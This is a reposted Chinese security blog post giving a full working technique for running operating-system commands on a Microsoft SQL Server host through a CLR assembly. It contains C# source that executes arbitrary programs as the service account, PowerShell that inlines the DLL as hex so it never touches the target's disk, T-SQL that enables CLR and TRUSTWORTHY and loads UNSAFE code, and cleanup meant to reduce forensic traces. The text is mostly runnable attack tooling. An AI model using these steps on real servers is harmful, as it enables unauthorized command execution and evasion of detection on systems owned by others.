「转」MSSQL CLR 执行命令



https://www.cnblogs.com/websecyw/p/11888947.html

首先创建一个 DLL，其功能是执行系统命令：通过 System.Diagnostics.Process 启动指定的程序，并把它的 stdout/stderr 作为字符串返回。下面的 Hi.Test.SQLClr 类暴露了三个入口：Run（后面映射为标量函数）、RunProc（映射为存储过程）和 ProcessArch（返回宿主 SQL Server 进程是 x64 还是 x86）。

代码

using System;
using System.Data;
using System.Data.SqlTypes;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using Microsoft.SqlServer.Server;
 
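namespace Hi.Test
{
    /// <summary>
    /// SQL CLR entry points that run an arbitrary program on the SQL Server host and
    /// hand its output back to the T-SQL caller. Because it spawns processes, the
    /// assembly has to be loaded WITH PERMISSION_SET = UNSAFE, and everything here
    /// executes as the SQL Server service account with that account's privileges.
    /// Written in C# 2.0 syntax so it still compiles with the .NET 2.0 csc used below.
    /// </summary>
    public class SQLClr
    {
        /// <summary>
        /// Runs <paramref name="proc"/> with <paramref name="arg"/>, waits for it to exit
        /// and returns its stdout followed by its stderr. Any failure (typically the
        /// program cannot be started) is returned as the exception text rather than
        /// thrown, so the scalar-function mapping in T-SQL always receives a string.
        /// </summary>
        /// <param name="proc">Executable to start; resolved from the SQL Server process.</param>
        /// <param name="arg">Command line passed to the executable unchanged.</param>
        /// <returns>stdout + stderr of the child, or the exception text on failure.</returns>
        public static string Run(string proc, string arg)
        {
            try
            {
                // 'using' releases the Process handle; the original never disposed it.
                using (Process child = new Process())
                {
                    child.StartInfo.FileName = proc;
                    child.StartInfo.Arguments = arg;
                    child.StartInfo.UseShellExecute = false;
                    child.StartInfo.RedirectStandardOutput = true;
                    child.StartInfo.RedirectStandardError = true;

                    // With both pipes redirected, calling WaitForExit() and only then
                    // reading the streams one after another deadlocks as soon as the
                    // child fills the stderr pipe buffer: the child blocks on write,
                    // we block on wait. Drain stderr asynchronously while stdout is
                    // read synchronously.
                    StringBuilder stderr = new StringBuilder();
                    child.ErrorDataReceived += delegate(object sender, DataReceivedEventArgs e)
                    {
                        // A null Data marks end of stream.
                        if (e.Data != null)
                        {
                            stderr.AppendLine(e.Data);
                        }
                    };

                    child.Start();
                    child.BeginErrorReadLine();
                    string stdout = child.StandardOutput.ReadToEnd();
                    // The parameterless WaitForExit also waits for the asynchronous
                    // stderr reader to complete, so stderr is final after this call.
                    child.WaitForExit();

                    return stdout + stderr.ToString();
                }
            }
            catch (Exception ex)
            {
                // Deliberate best-effort: the caller is T-SQL and can only consume a string.
                return ex.ToString();
            }
        }

        /// <summary>
        /// Stored-procedure entry point: runs <see cref="Run"/> and streams the result to
        /// the client as a single-row result set with one column named "ret".
        /// </summary>
        /// <param name="proc">Executable to start.</param>
        /// <param name="arg">Command line for the executable.</param>
        public static void RunProc(string proc, string arg)
        {
            // NVARCHAR(MAX) instead of NVARCHAR(4000): command output can easily exceed
            // 4000 characters and must not be limited by the result column's length.
            SqlMetaData column = new SqlMetaData("ret", SqlDbType.NVarChar, SqlMetaData.Max);
            SqlDataRecord row = new SqlDataRecord(column);
            row.SetString(0, Run(proc, arg));

            SqlContext.Pipe.SendResultsStart(row);
            SqlContext.Pipe.SendResultsRow(row);
            SqlContext.Pipe.SendResultsEnd();
        }

        /// <summary>
        /// Reports the bitness of the hosting SQL Server process: "x64" when native
        /// pointers are 8 bytes wide, otherwise "x86".
        /// </summary>
        /// <returns>"x64" or "x86".</returns>
        public static string ProcessArch()
        {
            return IntPtr.Size == 8 ? "x64" : "x86";
        }

        // Not referenced by any method above; it looks like a leftover from a
        // shellcode-loader template. It is dead code at runtime, but a VirtualAlloc
        // P/Invoke signature is exactly what static scanners and AV engines flag, so
        // drop it if the assembly only needs to run commands.
        [DllImport("kernel32.dll")]
        static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, uint size, uint flAllocationType, uint flProtect);
    }
}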

在本地编译为 DLL。注意 CLR 版本要能被目标实例加载：SQL Server 2005–2008 R2 宿主的是 CLR 2.0，2012 及以上宿主的是 CLR 4。用下面的 .NET 2.0 csc 编译出的程序集在两类实例上都能加载，而用 4.x 编译的 DLL 在旧实例上会加载失败：

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /target:library c:\1.cs


为了不落地（不把 DLL 写到目标机器的磁盘上），需要把生成的 DLL 转成十六进制字符串，直接作为 CREATE ASSEMBLY ... FROM 0x... 的字面量传给 SQL Server；下面用 PowerShell 完成转换并生成对应的 T-SQL。生成的 CREATE PROCEDURE/FUNCTION 语句必须与 DLL 里实际的类名和方法名（Hi.Test.SQLClr 的 Run / RunProc）一致，否则只能单独取用其中的 hex 部分。


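# Emit a T-SQL script that loads the compiled CLR assembly without writing it to the
# target's disk: the DLL bytes are inlined as a 0x... hex literal in CREATE ASSEMBLY.
# The generated CREATE PROCEDURE/FUNCTION lines target the Hi.Test.SQLClr class
# defined above (RunProc / Run). The original template referenced a
# [StoredProcedures].[clr_exec] entry point, which that DLL does not contain.
$assemblyFile = "C:\Users\hello\Desktop\1.dll"   # DLL produced by csc.exe
$assemblyName = "sysinfo"                        # assembly name used by the T-SQL below
$outputFile   = "d:\2221.txt"

# ReadAllBytes opens and closes the file itself; the original left its FileStream open.
$bytes = [IO.File]::ReadAllBytes($assemblyFile)
# BitConverter renders upper-case "4D-5A-..."; strip the separators to get the 0x literal.
$hex   = ([BitConverter]::ToString($bytes)).Replace("-", "")

$sql = New-Object -Type System.Text.StringBuilder
# UNSAFE is required because Run() spawns processes via System.Diagnostics.Process.
$sql.AppendLine("CREATE ASSEMBLY [$assemblyName] AUTHORIZATION [dbo] FROM") | Out-Null
$sql.AppendLine("0x$hex") | Out-Null
$sql.AppendLine("WITH PERMISSION_SET = UNSAFE") | Out-Null
$sql.AppendLine("GO") | Out-Null
$sql.AppendLine(" ") | Out-Null
$sql.AppendLine("CREATE PROCEDURE [dbo].[${assemblyName}_run_proc] @proc NVARCHAR(MAX), @arg NVARCHAR(MAX) AS EXTERNAL NAME [$assemblyName].[Hi.Test.SQLClr].[RunProc];") | Out-Null
$sql.AppendLine("GO") | Out-Null
$sql.AppendLine(" ") | Out-Null
$sql.AppendLine("CREATE FUNCTION [dbo].[${assemblyName}_run](@proc NVARCHAR(MAX), @arg NVARCHAR(MAX)) RETURNS NVARCHAR(MAX) AS EXTERNAL NAME [$assemblyName].[Hi.Test.SQLClr].[Run];") | Out-Null
$sql.AppendLine("GO") | Out-Null
$sql.AppendLine(" ") | Out-Null
$sql.AppendLine("EXEC [dbo].[${assemblyName}_run_proc] 'whoami', '/user'") | Out-Null
$sql.AppendLine("GO") | Out-Null

# The script is pure ASCII; Out-File's default encoding (UTF-16 on Windows PowerShell)
# would double its size and trips some tools, so write it as ASCII.
$sql.ToString() | Out-File -FilePath $outputFile -Encoding ASCII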

利用上面生成的 hex，在目标实例上创建程序集以及对应的存储过程/函数，然后执行系统命令。前提是拥有 sysadmin（或等价的 ALTER SETTINGS + 创建 UNSAFE 程序集的权限）；命令会以 SQL Server 服务账户的身份在数据库主机上执行。以下语句逐条执行。注意 SQL Server 2017 及以上默认开启 clr strict security，未签名的 UNSAFE 程序集会被拒绝加载，需要先用 sp_add_trusted_assembly 登记程序集哈希，或者（更吵）关闭该选项。

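-- Host the assembly in msdb: the database that holds an UNSAFE assembly must be
-- TRUSTWORTHY, and msdb already is by default. The original toggled TRUSTWORTHY on
-- master, which is not the database the assembly is created in.
use msdb;

-- Snapshot the settings this script changes so the cleanup step can restore the
-- real previous values instead of assuming CLR was off beforehand.
select name, is_trustworthy_on from sys.databases where name = db_name();
select name, value_in_use from sys.configurations where name in ('show advanced options', 'clr enabled', 'clr strict security');

alter database msdb set trustworthy on;

-- Needs sysadmin / ALTER SETTINGS. Every sp_configure change is written to the
-- SQL Server error log ("Configuration option '...' changed from 0 to 1").
exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'clr enabled',1;reconfigure;

-- SQL Server 2017+ also has 'clr strict security' ON by default, which refuses an
-- unsigned UNSAFE assembly. Either register its hash with sp_add_trusted_assembly
-- or, noisier, turn the option off (and put it back afterwards):
-- exec sp_configure 'clr strict security',0;reconfigure;

create assembly sysinfo from 0x... /* paste the hex string from 2221.txt here */ with permission_set=unsafe;

-- Both entry points map to Hi.Test.SQLClr: the procedure returns a one-row result
-- set, the function returns the output as a scalar (usable inside SELECT).
create procedure sysinfo_run_proc(@proc nvarchar(max),@arg nvarchar(max)) as external name sysinfo.[Hi.Test.SQLClr].RunProc;
create function sysinfo_run(@proc nvarchar(max),@arg nvarchar(max)) returns nvarchar(max) as external name sysinfo.[Hi.Test.SQLClr].Run;

-- Runs as the SQL Server service account on the database host.
select msdb.dbo.sysinfo_run('whoami','/user');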

利用完毕后删除创建的函数、存储过程和程序集，并把 clr 相关配置恢复为原始状态。注意：只有在操作前 clr enabled 本来就是 0 时才应把它改回 0（操作前先记录 sys.configurations 的值），否则会破坏目标上原有的 CLR 功能并留下更明显的痕迹。sp_configure 的每次变更都会写入 SQL Server 错误日志，CREATE ASSEMBLY 等 DDL 也可能被默认跟踪或审计捕获，蓝队可据此检测。

-- Tear-down: dependents first (function and procedure), then the assembly, then the
-- server options. Only put 'clr enabled' back to 0 if it was 0 before the run
-- (record sys.configurations before changing anything); disabling CLR on a server
-- that relied on it is both disruptive and a louder signal than leaving it alone.
drop function sysinfo_run;
drop procedure sysinfo_run_proc;
drop assembly sysinfo;

-- Each sp_configure change is logged to the SQL Server error log.
exec sp_configure 'clr enabled',0; reconfigure with override;
exec sp_configure 'show advanced options',0; reconfigure with override;

-- TRUSTWORTHY on the hosting database is not reverted here; if it was switched on
-- earlier and was OFF before, restore it (alter database <db> set trustworthy off;).

https://evilanne.github.io/2020/06/26/SQLServer-CLR/